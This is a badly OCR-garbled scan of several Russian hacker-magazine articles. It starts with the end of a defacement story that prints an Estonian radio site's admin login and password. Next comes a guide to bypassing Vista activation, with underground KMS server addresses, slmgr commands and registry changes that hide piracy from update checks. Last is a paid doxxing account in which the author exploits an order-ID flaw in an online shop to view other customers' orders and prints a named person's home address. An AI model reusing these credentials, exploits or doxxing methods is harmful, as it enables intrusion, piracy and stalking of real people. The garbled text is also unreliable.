названии радио Паасііо 7 как раз 7 символов, я попробовал 
залогиниться. ..На этот раз удача была на моей стороне — я 
оказался внутри :). В общем, админский аккаунт попал в 
мои заботливые руки: 



г \ 




ч 

> На дискеты найдешь 
видео по взлому, в 
котором я покажу, 
какзадефейсил сайт 
эстонского радио. 



логин: асітіпізбгабог 
пароль: гаасІ.іо7 

Создав новый опрос и проверив, какой отображается на 
индексе ресурса, я довольно улыбнулся =). Задефейсить 
сайт эстонского радио Паасііо 7, располагающийся по 
адресу ѵѵѵѵѵѵ. гаабіо7.ее . не составлялотеперь никакого 
труда :). 



За Победу 

Как видишь, даже в почти безвыходных ситуациях можно 
найти выход, если очень захотеть =). Напоследок озвучу 
пару мыслей насчет дефейсов. Я всегда считал их детской 
забавой, не более. Максимум, чего обычно добиваются 
дефейсами, — это привлечение внимания. И хорошо, 
когда это внимание требуется привлечь к какой-либо 
проблеме, как в нашем случае, а не к самому себе. День 
Победы навсегда останется для нас праздником со 
слезами на глазах. И до тех пор пока мы будем позволять 
топтать историю и честь своей Родины, мы никогда не 
станем сильной державой и могучим народом. Вот именно 
к этой проблеме мы и хотели привлечь твое внимание, 
а по поводу дефейсов я все сказал. Поверь, настоящие 
профессионалы работаюттихо и незаметно, и дефейсы им 
абсолютно не нужны =). цц 



г \ 




>Внимание! Инфор- 
мация представлена 
исключительно с 
целью ознакомле- 
ния! Ни автор, ни 
редакция за твои 
действия ответствен- 
ности не несут! 
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Хакерская активация Висты 

Многие энтузиасты, желающие пересесть на Висту, столкнулись с проблемами активации 
системы, купленной в ближайшем ларьке в полном соответствии с действующим законо- 
дательством. И хотя в сети уже появилась куча «ломиков», многие из них представляют 
собой троянские программы, созданные специально для заманивания доверчивых пользо- 
вателей. Между тем активировать Висту не просто, а очень просто, надо только знать как ;). 



идеры рынка программного обеспечения прекрасно 
осведомлены отом, что любыезащитные механизмы (даже 
самые невинные и неназойливые) отрицательно сказы- 
ваются на динамике продаж, поскольку пиратов никакая 
защита все равно не остановит, а воту честных пользователей возникают 
серьезные проблемы, в результате чего они либо уходят к конкурентам, 
либо обращаются за помощью кхакерам. 

Вплоть до появления ѴѴіпсІоѵѵз 2000, компания МісгозоЙ: ограничива- 
лась однократной проверкой серийного номера на этапе инсталляции 
системы, что позволяло пользователям (и пиратам) тиражировать один 
легально купленный диск в неограниченном количестве. Для оценки 



масштабов пиратства МісгозоГС выпустила специальную утилиту, 
проверяющую подлинность установленной копии ѴѴіпсІоѵѵз, назойливо 
предлагая пользователям почекаться при скачке обновлений. Первое 
время проверка была необязательна и обновления отдавались и так. Но 
затем МісгозоЙ ужесточила политику, оставив в свободной раздаче лишь 
критические заплатки, и Вегѵісе Раск 4 стал отдаваться только после 
проверки подлинности. Потому многим пользователям, использующим 
пиратские версии, пришлось качать обновления с варезных сайтов. 

ВХР проверка подлинности стала обязательной, и даже легально 
купленная система требует активации (осуществляемой через интернет 
или голосовой телефон), без которой переходит в режим ограниченной 
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> Предупреждение о необходимости проверки подлин- 
ности, выдаваемое компонентом ѴѴбА в течение 
30 дней, отпущенных для активации 



функциональности, «счастью, корпоративная версия (не 
предназначенная для розничной продажи) работает и без 
этого «чуда», и проверка подлинности осуществляется лишь 
при установке обновлений. Причем критические обновления 
по-прежнему можно скачивать без всяких проверок. 

В Висте требуется активировать все версии (втом числе и 
Епіегргіве — бывший Согрогайѵе Ебійоп), причем при смене 
железа активацию необходимо осуществлять вновь. МісговоЙ 
оставляетза собой право отказать в выдаче нового ключа без 
объяснения причин. Добавь сюда еще ложные срабатывания 
защиты (которые случаются достаточно часто) и ответь мне на 
вопрос: ты все еще надеешься обойтись без хакерских приемов? 

Система активации снаружи и изнутри 

За проверку подлинности Висты отвечает компонент ѴѴ6А 
(ѴѴіпсіоѵѵв бепиіпе Асіѵа пЕаде) , ранее реализованный в 
М іеговой Ойісе, где он назывался Ойісе бепиіпе Абѵапіаде 
(или 06А). ѴѴ6А привязывается кжелезу, генерируя специ- 
альный серийный номер, отправляемый на сервер проверки 
подлинности и возвращающий пользователю ключ актива- 
ции, который необходимо ввести втечениеЗОдней с момента 
установки системы. В противном случае Виста перейдет в 
так называемый режим ограниченной функциональности 
(гебисесі йіпейопаійу тобе, или РЕМ). В этом режиме нет 
главного меню, значков рабочего стола, а заставка рабочего 
стола замещена черным фоном. Но хуже всего то, что через 
час работы система завершаеттекущий сеанс без всякого 
предупреждения! 

Ключ активации генерируется на основании приведенных 
ниже данных и автоматически аннулируется при их измене- 
нии (включая даже такую невинную операцию, какобновле- 
ние прошивки ВІОЗ), требуя повторной активации: 

ргосіисй кеу и ргосіиср ІБ 

контрольная сумма ВІОЗ 




> Главная страница подпольного китайского КМЗ-сер- 
вера ѵЬз.пеІ.сп, где среди иероглифов отчетливо вы- 
деляется текущий назначенный порт, равный в данном 
случае 7249 



вендор/ версия /дата ВІОЗ 
МАС- адрес сетевой карты 
версия операционной системы 
серийный номер жесткого диска 
языковые профили операционной системы 

Естественно, подобный подход неприемлем для крупных 
компаний и корпораций, поскольку он ставитих в прямую 
зависимость от МісговоЙ, и потому последней пришлось 
пойти на уступки, включив поддержку многопользователь- 
ских ключей активации (они же Мийіріе Асйѵайоп Кеув, или 
МАК), впервые реализованных в пакетах МЗбЫ бпіѵегваі и 
МісговоЙ Асйоп Раск. 

Каждый МАК-ключ может активировать определенное коли- 
чество компьютеров заданное число раз (основанное натипе 
соглашения между потребителем и компанией МісговоЙ). 

При исчерпании активаций потребитель может бесплат- 
но возобновить МАК-ключ, позвонив в местный центр 
обработки активаций. МАК-ключи можно использовать для 
активации любой многопользовательской версии Висты (не 
стоит путать МАК-ключи с ключами установки, МАК-ключи 
— это ключи активации). 

При выполнении МАК-активации клиентский компьютер 
генерирует идентификатор установки (Ю) и передает его сер- 
веру активации МісговоЙ по интернету или «вручную» через 
голосовой телефон. Приуспешном завершении операции 
сервер возвращает МАК-ключ и идентификатор подтверж- 
дения (СЮ). МАК-ключи хранятся в незашифрованныхХМй- 
файлах, копируемых на компьютер в процессе автомати- 
ческой установки в папку %вув1;етгооІ%\рап1;Ьег, но в конце 
установки подлинное значение параметра Р го би сЖеу уда- 
ляется и заменяется строкой «5ЕЫ51Т1\/Е*0АТА*0Е1_ЕТЕ0» 
(«конфиденциальные данные удалены»). Это сделано для 
того, чтобы пользователи не могли влиять на этот ключ и 
чтобы они не могли получить его после того, как он был 




>«Тйе ѴѴіпсіоѵѵв 
бепиіпе Айѵапіаде 
(ѴѴбА) апсі Сйісе 
бепиіпе Айѵапіаде 
(ОбА) РАО» — офици- 
альный РАО по ѴѴбА 
и ОбА от МісговоЙ (на 
английском языке): 
ѵѵѵѵѵѵ.гп іеговой, 
сот/депиіпе/ 
сІоѵѵп[оасІз/РАО. 
аврх?сіівр[аѵ[апа=еп . 

«ЗІ_А2.0 ЗирроНесІ 
ВІ05евй)гІпв1:апІ 
ѴѴіпсІоѵѵв Ѵівіа ОЕМ 
Асйѵайоп» — статья, 
рассказывающая 
об ОЕМ-активации 
Висты, осущест- 
вляемой путем 
редактирования 
прошивки ВІОЗ (на 
английском языке): 
ѵѵѵѵѵѵ.тѵсІіайаШ^е. 
іпЬ/2007/02/21/вІа- 
20-виррогІесІ-Ьіовев- 
йзг-іпвіапйѵѵіпсіоѵѵв- 
ѵівіа-оет-аейѵайоп/ . 



І_одМеІп РІатасЬі 
— популярная 
программа для 
безопасного обмена 
файлами через 
ѴРЫ, используемая 
многими хакерами 
для распространения 
Висты: ѵ\ллл/ѵ.ИатасЫ.сс. 
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«Пошаговое руко- 
водство к службе 
ѴѴіпсІоѵѵз Ѵізіа Ѵоіите 
Асііѵаііоп 2.0» — офи- 
циальный документ 
от Місгоэоіі по сис- 
теме активации (на 
русском языке): ѵѵѵѵѵѵ. 
гпісгозоіі.сот/гиз/ 
іесбпеіАл/іпсІоѵѵзѵізіа/ 
ріап/ѵоіасіі.тзрх . 

«Місгозоіі ѴѴіпсІоѵѵз 
Ѵізіа — варез, а не ак- 
тивация!» — ссылки 
на корпоративную 
редакцию Висты, 
образы активирован- 
ных КМ5-серверов, 
пошаговые руководс- 
тва по активации 
(на русском языке): 
ЬіірѴ/іогиіті.ги-ЬоагсІ. 
сот/іоріс.саі?іогит= 
35&іоріс=33б90#1 . 

«ѴѴіпсІоѵѵз бепиіпе 
Абѵапіаде» 

— обзорная статья на 
ѴѴікіребіа, посвя- 
щенная \Л/6А(на 
английском языке): 
Ы:1:р://еп.\л/ікіресПа. 
огд/ѵѵікі/ѴѴіпбоѵѵБ 
бепиіпе Абѵапіаае . 




> Ввод МАК-ключа для активации Висты через графи- 
ческий интерфейс 



установлен на компьютер. Поэтому, чтобы получить МАК- 
ключ, необходимо иметь оригинальный инсталляционный 
диск, которым можно пользоваться не только на работе, но 
и дома. В принципе, имея знакомых в ІТ-сфере, выпросить 
валидный ключ не проблема. После этого его останется уста- 
новить по методике, описанной во врезке «Активация Висты 
с помощью МАК-ключа». 

Служба управления ключами Кеу Мападетепі Вегѵісе (КМ5) 
позволяет выполнять самостоятельную активацию компью- 
теров влокальной сети без обращения ксерверам компании 
Місгозоіі. КМ5-службу можно задействовать на любом 
компьютере под управлением Висты или Зегѵег І_опдііогп, 
установив КМБ-ключ и затем активировав этот компьютер 
через сервер компании Місгозоіі. В отличие от МАК-клю- 
чей, КМВ-ключи устанавливаются только на компьютеры, 
управляющие КМ5-службой, но никогда — на активируемые 
ими компьютеры! 

Версии Висты, предназначенные для розничной продажи, не 
могут быть активированы через КМ5-службу, что, вп рочем, не 
является камнем преткновения, поскольку найти корпоратив- 
ную версию можно в любом киоске, в Осле или на варезном 
сервере. Предоставление прав на корпоративную версию 
Висты предполагает наличие корпоративной лицензии 




> Служба автоматического обновления системы 
ѴѴіпсІоѵѵз Апуііте ІІрдгасіе успешно отключена! 



на предыдущую операционную систему. По умолчанию 
носители с32-разрядными корпоративными версиями 
Висты предназначены только для обновления и не являются 
загрузочными, поэтому сначала необходимо установить 
предыдущую версию ѴѴіпсІоѵѵз, а затем поверх нее водрузить 
Висту (кстати говоря, загрузочные носители также можно 
получить по запросу через портал корпоративных лицензий). 
Носители с 64-разрядными версиями не имеютподобных ог- 
раничений, однако пользоваться ими, в силу отвратительной 
обратной совместимости, категорически не рекомендуется. 
Поумолчанию ключи, выдаваемые службой КМ5, ограничи- 
ваются шестью компьютерами, каждому из которых дается 
до девяти повторных активаций, однако при необходимости 
Місгозоіі может предоставить специальные КМ5-ключи, 
рассчитанные на заданное количество активаций. Впрочем, 
если покурить хорошей травы, то можно обойтись и без по- 
мощи Місгозоіі. Достаточно, например, установить систему 
на виртуальную машину, получить КМ5-ключ и снять образ, 
используя его столько раз, сколько компьютеров необходимо 
активировать. 

Осознавая слабость КМ5-ключей, Місгозоіі: ужесточила 
правила КМ5-активации. Прежде всего, КМ5-сервер на- 
чинает раздавать СЮ'ы только после того, как получает по 



АКТИВАЦИЯ ВИСТЫ С ПОМОЩЬЮ МАК-КЛЮЧА 



Существует два способа МАК-активации: самостоя- 
тельная и опосредованная. Самостоятельная МАК-ак- 
тивация выполняется пользователем и требует прямого 
соединения с интернетом. Опосредованная МАК-акти- 
вация позволяет выполнять централизованный запрос 
активации для нескольких компьютеров с помощью 



одного подключения ксерверам компании Місгозоіі. 
Однако в настоящее время она все еще находится в 
стадии разработки, проходящей под кодовым названи- 
ем ѴАМТ (что расшифровывается как Ѵоіите Асііѵаііоп 
Мападетепі Тооі — «средство управления много- 
пользовательской активацией»), поэтому ниже будет 
рассмотрена только самостоятельная активация. 
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Состояния лицензирования 
\Уіпс1о\ѵ5 Ѵізіа и ЪопДюгп Зегѵег 



меньшей мере 25 запросов на активацию от разных машин. МісгоэоД 
прямо так и пишет: «Использование службы КМ 5 предназначено 
для управляемых сред, в которых к сети организации постоянно под- 
ключено более 25 компьютеров. Клиентские компьютеры используют 
информацию, полученную на сервере службы КМ5, для самостоя- 
тельной активации. К серверу службы КМ 5 должно быть подключено 
не менее 25 физических клиентских компьютеров под управлением 
системы ѴѴіпсІоѵѵз Ѵізіа, прежде чем какой-либо из этих компьютеров 
сможет пройти активацию. Это число называется значением п или 
счетчиком п. Компьютеры, работающие в средах виртуальных машин 
(ѴМ), также могутактивироваться с помощью службы КМ5, но они 
не включаются в число активированных систем». Как обеспечить 
подключение 25 узлов в рамках домашней локальной сети? Ну это 
даже не вопрос! Ставим виртуальную машину на 24 компьютерах, на 
каждый из них водружаем Висту, забрасываем образ КМ5-сервера и 
отправляем запрос на активацию, после чего перетаскиваем образ 
КМ5-сервера на свою основную систему и отправляем 25-й запрос. 
Все! Сервер считает, что к нему подключено 25 узлов и активирует 
нас, словно родную маму. 

В отличие от МАК-активации (которую достаточно выполнить всего 
один раз), КМ5-активацию необходимо повторять каждые 180 дней, 
по прошествии которых она аннулируется и система переходит в 
30-дневный триальный режим. А когда он закончится — в режим 
ограниченной функциональности до момента подключения к КМ5-сер- 
веру или МАК-активации, что, по замыслу МісгозоИ'а, предотвращает 
использование компьютеров втечение неопределенного срока без 
наличия соответствующей лицензии после их изъятия из организации. 
По умолчанию неактивированные клиенты пытаются подключиться к 
КМ5-серверу каждые 2 часа (это значение является настраиваемым), 
а после прохождения активации — каждые 7 дней (это значение также 
является настраиваемым) и в случае успешного завершения операции 
обновляют 180-дневный счетчикдней, оставшихся до истечения срока 
активации. Если активацию по каким-то причинам выполнить неуда- 
лось, система продолжит долбить сервер, предпринимая настойчивые 
попытки повторной активации, отключить которые можно путем измене- 
ния значения параметра реестра НКЕМ\50 РТѴѴАНЕ\Місгозоі1:\ѴѴіпсіоѵѵ 5 
ЫТ\Сиггеп1:Ѵег5Іоп\5Е\Ас1;іѵа1:іоп\МапиаІ на единицу. 

Причиной провала активации зачастую становится недемократично 
настроенный брандмауэр. Для КМ5-активации Виста используетано- 
нимный ПРО- протокол поверх ТСР, стучащийся в порт 1 688 (впрочем, 
номер порта не является жестко заданным и при желании может быть 
изменен). Клиентский компьютер уста на вливает ТС Р-соединение с 
КМ5-сервером и передает один пакетзапроса. КМ5-сервер отвечает 
и закрывает сеанс. Как при запросе активации, так и при запросе об- 
новления используется один и тот же тип передачи запроса и получения 




ответа, суммарная длина которого составляет 450 байт. Запросы и 
ответы регистрируются клиентом в журнале событий приложений 
(события компонента М іеговой ѴѴіпсІоѵѵз Эесигііу Ысепзіпд 51_С 
1 2288 и 1 2289 соответственно). КМЭ-сервер регистрируетзапросы 
клиентских компьютеров в событиях компонента МісгозоИ-ѴѴіпсІоѵѵз- 
5есигі1:у-І_ісеп5Іпд-5І_С 12290. 

Установка и активация Висты 

Таким образом, для миграции на Висту нам необходимо иметь 
загрузочный ОѴО-образ ѴѴіпсІоѵѵз Ѵізіа Визіпезз/Епіегргізе Ебіііоп, 
который можно добыть в Осле или скачать с ѵѵѵѵѵѵ.ги-ЬоагсІ.сот . 

В Епіегргізе-версии ключ продукта (Ргобисі Кеу, он же серийный 
номер) уже зашит внутри ріб.М, и потому вводить его при установ- 
ке не требуется. Активировать Висту можно на любом подпольном 
КМ5-сервере, их адреса публикуются на хакерских форумах (смотри 
врезку). Для этого необходимо запустить консоль с правами ад- 
министратора, воспользовавшись службой РипАз (или, завершив 
текущий сеанс, войти в систему под администратором), после чего 
набрать следующие команды: 

$сзсгірЪ \ѵѵіп(іоѵѵз\зузбет32\з1тдг . ѵЪз -зктз ІР_ад- 

рес_КМ5_сервера : порт 

$сзсгірЦ \ѵѵіп<іоѵ7з\зу8Цет32\з1тдг . ѵЪз -ако 



АКТИВНЫЕ ХАКЕРСКИЕ КМ5-СЕРВЕРЫ 



Ниже приводятся адреса некоторых подпольных КМ5-серверов, при- 
годных для активации корпоративных версий Висты, приобретенных 
в соседнем киоске в полном соответствии с действующим законода- 
тельством. 

Номера портов периодически меняются, поэтому, прежде чем акти- 
вироваться, следует посетить главную страницу и ознакомиться с 
оперативной ситуацией. В частности, для захода на сервер 



кгп5.ѵЬз.пеЕсп:7249 необходимо оттяпать номер порта (7249) и субдо- 
мен (ктз), набрав в адресной строке браузера «ѵЬз.пеЕсп», и там среди 
китайских иероглифов отыскать необходимую информацию. 

ктз . ѵЬз . пек . сп : 7 2 4 9 
рктз .хіер . сп 
210.51.189.66:1025 
210.51.189.66:1888 
121.46.195.58:1688 
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Для проверки успешности активации можно воспользоваться ключом 
-сШ’, переданным всетомуже скрипту зітдг.ѵбз: 

$сзсгірб \тпбоѵ7з\зузбет32\з1тдг .ѵЪз -сііѵ 
Версия службы лицензирования программного обеспече- 
ния: 6.0.5384.4 

АсбіѵабіопІБ: 1447 8аса-еа15 -4958 -ас34- 

35928110ІС99 

АррІісабіопІБ: 55с92734-б682-4б71-983е- 

б6ес31160591 

Расширенный РІБ: 11111-00140-009-000002-03- 

1033-5384.0000-1942006 

Установочный ІБ: 0009638433152594935985068542 

53663081409973656140419231 

Узнать, сколько дней осталось до повторной КМ5-активации поможет 
ключ -сШ’, выдающий подробную информацию по регистрации (для 
вывода более детальной информации о лицензировании используй ключ 
’-сІІѵаІГ): 

$сзсгірб \ѵ7Іпс1оѵ7з\зузЬеш32\з1тдг . ѵЪз -сііі 
Имя: Міпскжз (ТМ) Ѵізба, Епбегргізе ебібіоп 
Описание: Міпсіохѵз Орегабіпд ЗузЕет — Ѵізба , 

ЕЫѴІРОЫМЕЫТ сЬаппеІ 
Частичный ключ продукта : В.НХСМ 
Состояние лицензирования: Лицензированное 
Истечение срока действия корпоративной активации: 

43162 минут (29 дней) 

Окончание ознакомительного периода : 29.08.2007 
16:59:59 

Сііепб МасИіпе ІБ (СМІБ) : 45б450а8-2Ьеб-4б04-9271- 
6104516а1Ь60 

Автоматическое обнаружение с помощью БЫЗ : Имя сервера 
КМЗ не доступно с помощью БЫЗ 

Расширенный РІБ сервера КМЗ: 11111-00140-008-805425- 

03-1033-5384.0000-1752006 

Интервал активации: 120 минут 

Интервал обновления активации: 10080 минут 

Если зітдг.ѵбз возвращает код ошибки (записанный в шестнад- 
цатеричной нотации], определить соответствующее емутекстовое 
сообщение можно с помощью утилиты зіиі.ехе, запущенной из ко- 
мандной строки следующим образом: зіиі.ехе 0x2а 0х<код ошибки», 
например: 

$з1иі.ехе 0x2а 0х8007267С 

Для локальной системы не настроено ни одного БЫЗ- 
сервера . 

Ключи активации, сгенерированные подпольным КМ5-сервером, хорошо 
подходят для локальной регистрации системы, но палятся при установ- 
ке обновлений, которые Виста загружаетавтоматически. И чтобы не 
нарваться на неприятности, службу ѴѴіпсіоѵѵз Апубте іірдгасіе следует 
отключить, скачивая критические обновления безопасности вручную 
(они не требуют проверки подлинности]. 

Открываем редактор реестра, заходим в НКЕМ\5оЙ\л/аге\М1сгозоЙ\ 



ѴѴі псіоѵѵз \Си ггепіѴегзіоп\РоІісіе5, создаем там раздел \ЕхрІогег\ѴѴАІІ 
(в результате чего полная ветвь будет вы глядеть так: НКЕМ\5оЙѵѵаге\ 
М ісгозоІіУѴѴі пс!оѵѵ5\Сиггеп1:Ѵег5Іоп\РоІісіе5\ЕхрІоге г\\Л/А0) , переходим 
к\ѴѴАІ) и создает там ключ «ОізаЫесІ»типа 0ѴѴ0В0, установленный 
в значение «1 ». Все! Теперь служба автоматических обновлений 
отдыхает! 

Каквариант — активировать систему можно с помощью образа 
уже активированного КМ5-сервера, который ты либо найдешь 
на самом йѴй -диске известного происхождения, либо скачаешь 
с ѵѵѵѵѵѵ.ги-ЬогасІ.сот . Достоинство этого решения в том, что образ, 
устанавливаемый на виртуальную машину (которой обычно является 
ѴМѴѴаге], не требует наличия выхода в интернет и вообще не зависит 
ни от чьей воли (подпольные КМ 5-серверы могут закрыться в любой 
момент, ищи их потом). А недостаток — необходимость устанавливать 
ѴМѴѴаге, представляющую собой коммерческий продукт весом в 
полгектара. И хотя существует бесплатный «проигрыватель» образов 
ѴМѴѴаге Ріауег, с ним приходится изрядно попотеть, прежде чем КМ5- 
сервер увидит виртуальный сетевой адаптер, связывающий его с 
основной операционной системой. 

Просмотреть количество оставшихся лицензий, а также узнать парамет- 
ры сервера можно следующим образом: 

$сзсгірб \ѵ7ІпсІоѵ7з\зузЬет32\з1тдг.ѵЬз — <3.11 
Служба управления лицензиями активна 
Текущее количество : 7 
Порт: 1688 

Опубликование БЫЗ-записей: разрешено 
Приоритет КМЗ : нормальный 

Заключение 

Помимо описанных выше, существует множество других способов 
активации, основанных на модификации исполняемых файлов 
или редактировании прошивки ВІОЗ'а с целью включения в него 
валидного ОЕМ-идентификатора, обнаружив который Виста вообще 
не требует никакой активации. Однако все эти способы ненадежны и 
небезопасны, а потому прибегать к ним можно, разве что желая поэк- 
спериментировать. Никаких других оснований у нас нет. Какой смысл 
отказываться от МАК/КМ5-активации, особенно в нашей стране, 
где достать корпоративную редакцию Висты ничуть не сложнее, чем 
версиюдля розничной продажи? 

Проще всего активировать компьютер через графический интерфейс. 

Для этого необходимо: 

а) установить нужный носитель с корпоративной лицензией (во время 
установки ключ продукта нетребуется); 

б) войдя в систему с правами администратора, открыть «Пуск Панель 
Управления Компьютер Свойства»; 

в) в разделе «Активация» нажать кнопку «Изменить ключ продукта»; 

г) подтвердив запрос на изменение (кнопка «Продолжить»), ввести 
МАК-ключ. 

В следующий запланированный интервал времени компьютер попытает- 
ся выполнитьактивацию через интернет, сообщая об успешности (или не 
успешности) операции. 

Поклонники командной строки могутактивировать Висту через скрипт 
зітдг.ѵбз, передав ему ключ ‘-ірк’ вместе с МАК-ключом: 

$сзсгірб ХѵтіпсЗомз \ зу зСетЗ 2 \ з Ітдг . ѵЬз -ірк <МАК-ключ > цц 
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Мнимая анонимность 



Разведка в сети 

Ты наверняка наслышан об анонимности в сети, безопасности и прочих немаловажных 
аспектах. ѴРХГ, зоскз, ргоху — в журнале мы уже не раз писали о том, как максимально 
скрыть себя от постороннего (читай: правоохранительного :)) взгляда. Но на самом деле 
все не так просто. В сети содержится огромное количество информации практически на 
каждого человека, нужно лишь суметь завладеть ей и правильно воспользоваться. Хуиз- 
сервисы, базы паспортных данных, выписки платежных систем и онлайн-шопов — все это 
может помочь идентифицировать твою личность. Я не пытаюсь тебя запугать, я просто 
хочу, чтобы ты четко уяснил: анонимность в сети — это не более чем миф. Да что там гово- 
рить, сейчас ты убедишься в этом сам. 



чень часто случается так, что нам нужно добыть какую-либо 
конкретную информацию о человеке. И неважно, будет это 
номер машины, данные паспорта или номертелефона — чем 
полнее информация, тем лучше. Но проблема состоит в том, 
что добыть подобного рода материалы не так-то легко. Все специализи- 
рованные базы данных недоступны простым смертным, и многие из них 
являются тай ной за семью печатями. Так как же быть, если тебе требуется 
собрать данные о конкретном человеке?Ты могзаметить, что в одном из 
предыдущих предложений я допустил маленькую оговорочку: «недоступ- 
ны простым смертным», причем сделал я это умышленно =). Не буду кри- 
чать, что хакерам закон не писан, но вот в доступе насточно ограничивать 
бессмысленно :). Собрать необходимые данные вполне реально, требуется 
лишь время, желание и трезвая голова на плечах. Чтобы сильно не загру- 
жать тебя теорией, я рассмотрю интересный случай из моей практики, на 
базе которого и разберу все тонкости вопроса =]. 



Однажды ко мне в асю стукнул мой старый знакомый, который попросил 
помочьодному из его клиентов. Времени натотмоменту меня было пре- 
достаточно, чего не скажешь о деньгах, поэтому я без особых раздумий 
согласился обговорить детали с заказчиком. Какоказалось, суть задания 
заключалась в нахождении координат какого-то америкоса. От меня тре- 
бовалось предоставить данные о месте жительства, номерахтелефонов 
и всем том, что я еще смогу нарыть по этому человеку. Из всей информа- 
ции у моего клиента было лишь имя искомого (Ротап ѴѴеІАз) и его мыло. 
Интересоваться причиной поиска амера не входило в мою компетенцию, 
тем более что меня вполнеустраивал обещанный гонорар :). Времени 
на выполнение заказа было отведено нетак много, поэтому следовало 
оперативно приступать к работе. 

Первым делом я вбил в Гугле имя разыскиваемого. Результат, честно 
говоря, оптимизма мне не прибавил. Фамилия попаласьдостаточно рас- 
пространенная, и поисковик выплюнул мне около двух десятков страниц. 
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> Выдранная из базы шопа информация озаказе=) 



Парсить Гугл не имело смысла, поскольку не было никакой гарантии того, 
что я наткнусь именно на своего Потап'а ѴѴеІІз'а. 

Тогда я вспомнил об интернет-сервисе 2аЬа5еагсЬ. Ресурс представлял 
собой базу паблик-данных по жителям Америки и располагался по адресу 
ѵѵѵѵѵѵ.гаЬавеагсЬ.сот . Я надеялся выудить хоть какую-нибудь информа- 
цию по интересующему меня объекту, так как начинать глобальные поиски 
без дополнительных зацепок было крайне проблематично. Но, увы, к 
моему разочарованию, 2аЬа5еагсб не далеко ушел от Гугла в плане коли- 
чества найденных объектов. Полистав пару ссылок, выбранных наугад, я 
понял, что толку от таких действий будетмало. Что ж, разсфамилией мне 
не повезло (вернее, с фамилией мне повезло, а вотс объектом — нет=)), 
нужно было искать другой путь. 

Надежда оставалась одна — мыло искомого. Вариант взлома я оставил на 
крайний случай, так как ящик находился на уаЬоо.сот . что определенным 
образом усложняло задачу. Но вот в Гугл етаіія все же вбить не поленил- 
ся :). Ксчастью, на этот раз мне повезло больше, и поисковик выдал всего 
пару страниц. Пробежав глазами по линкам, я быстро отметил несколько 
форумов, в профиле пользователей которыхзначилосьуказанное мной 
мыло амера. Выбранные форумы были незамедлительно проверены, 
а вся информация из профилей сзаданным мылом отправилась ко мне 
на винт. Однако ничего особенно полезного мне почерпнуть не удалось, 
кроме разве что штата проживания амера — ѴѴівсопзіп. 

Еще один любопытный момент я обнаружил в постах моего объек- 
та. На одном из форумов амер расхваливал некий интернет-шоп, в 
котором он, судя по всему, делал покупки. Этотфактзаинтересовал 
меня. Как ты понимаешь, все интернет-магазины хранят подробные 
логи заказов. Следовательно, стянув базу шопа, я имел шанс получить 
данные американца. Набрав в адресной строке своего браузера 
адрес ѵѵѵѵѵѵ.ІіаЬиепз.сот . я оказался на сайте амерского интернет- 
магаза. Дизайн ресурса интересовал меня мало, хотя выполнен он 
был на приличном уровне. Полазив по сайту шопа некоторое время 
и не найдя явных зацепок, я запустил сканер веб-уязвимостей и лег 
спать. Проснувшись, первым делом я заглянул в лог сканера — увы, 
но результат был нулевым :(. Но тут я обратил внимание на то, что шоп 
стоит на движке 5-СагЕ Как оказалось, в некоторых его версиях есть 
возможность просмотра информации о чужих заказах. Изначально урл 
запроса выглядел так: 

Ыкр: / /ІідШепз . сош/з-сагк/ѵіем-огсіег . 

рЬЫіІ ?Г_%20зЕгРігз ЕЫаше = 3 3 3 & Г_з Ь г Ьаз ЕЫаше = 3 3 3 & Г_ 

іпЦ0г(ЗегІВ=номер_твоего_заказа 

Параметр НпЮгбегЮ указывает номер заказа. Но местные кодеры 
допустили ошибку, благодаря которой, без дополнительной авторизации, 
можно было листать значения НпЮгсІегЮ и просматривать чужую инфу =]. 
Сперва я затестил багу, подменив данные параметра: 
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> База данных ГИБДД в хакерских руках :) 

ГЩЦр: //ІідІіРІепз . сош/з-сагк/ѵіеѵг-огсіег . 

рЪСтІ ? Г_% 2 0 з б г Р і г з ДЫате = 3 3 3 & Г_з Е г Ьа з СЫате= 3 3 3 & Г_ 

іпДОгсЗег ІБ= 5 1 8 9 

И моему взору предстал подробный отчет по Огбег ЫигпЬег 51 89. Удивило 
меня лишь одно: я задал заказ №5189, а он был оформлен еще в 2003 году. 
Вспомнив, какой нынче год, и прокрутив в голове пару нехитрых арифме- 
тических операций, я сделал вывод, что в базе хранится информация о 
десяткахтысяч клиентов! Через несколько минут мои догадки подтвер- 
дились. Перебирать ручкамитакое количество запросов было попросту 
нереально, и я собирался уже написать для этих целей специализиро- 
ванный парсер на РНР, когда вспомнил о посте искомого амера на одном 
из форумов. Идея заключалась в том, чтобы по дате поста вычислить 
приблизительную дату заказа в интернет-магазе. Ксчастью, мне повезло 
— постбыл оставлен америкосом в конце марта 2007 года, значит, парсить 
базу шопа стоило в обратном порядке (с конца) не ранее этого времени. 
Мысли о написании парсера тутже улетучились, зато на моем столе 
оперативно образовалась бутылочка пива =). Через час активных поисков 
я нашел данные о заказе своего объекта: 

ГШЕр: //Іідіікіепз . сот/з-сагЦ/ѵіеѵ\г-огс1ег . 

рЪСтІ ? Г_% 2 0 з б г Р і г 8 ЦЫате = 3 3 3 & Г_з Е г Ьа з СЫате= 3 3 3 & Г_ 

іпСОгсІегІБ=33545 

В общем виде полученная мной инфа имела следующий вид: 

Огіег ЫшлЬег 33545 
РгсхЗисЕ Ыаше 

Н4 12Ѵ 100 — 9 0Ѵ7 Ригріе БідЫпіпд ВиІЬз (2 ЬиІЬз) 01- 

140 1 

ТАХ : $ 0.00 

5НІРРШС : $ 4.90 

ТОТА!. ВІБЬЕБ АМОШТ : $ 0.00 

ОРБЕР БАТЕ : 2007-03-12 

ЗНІР ТО : Рошап Меііз 

882 12СІіАѵе. ЗоиЫі 

Опаіазка, N1 54650 

БпіЦесІ ЗЕаЕез 

ВІЬБ ТО : Рошап Меііз 

882 12Д]іАѵе. ЗоиЫі 

Опаіазка, N1 54650 

Шікесі ЗбаЕез 

Особый интерес для меня представляли поля 5НІРТ0 и ВІІ_І_Т0. Но 
так как адреса в них совпадали, я не стал лишний раз заморачиваться. 
Кроме того, в поле штата стояло «ѴѴІ», что еще раз указывало на то, что это 
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именнотот, кого я ищу. В принципе, я могуже отстучать в асю 
клиенту и сообщить обуспешном выполнении заказа, но мне 
надо было убедиться в том, что я нашел именно порученно- 
го мне амера. Для начала я решил проверить валидность 
адресных данных. Запустив прогу СС2Вапк, я вбил амерский 
7Л р- код (54650) в поле 2ір и нажал «Зеагсб». Оказалось, что 
этот іір действительно принадлежал городу Опаіазка штата 
ѴѴІБСопвіп. Сомнений не оставалось — гонорар был у меня в 
кармане =). 

Однако из любопытства я решил пробить амера на 
ѵѵѵѵѵѵ.іпіеііив.согп . Этот ресурс содержал инфу о гражданах 
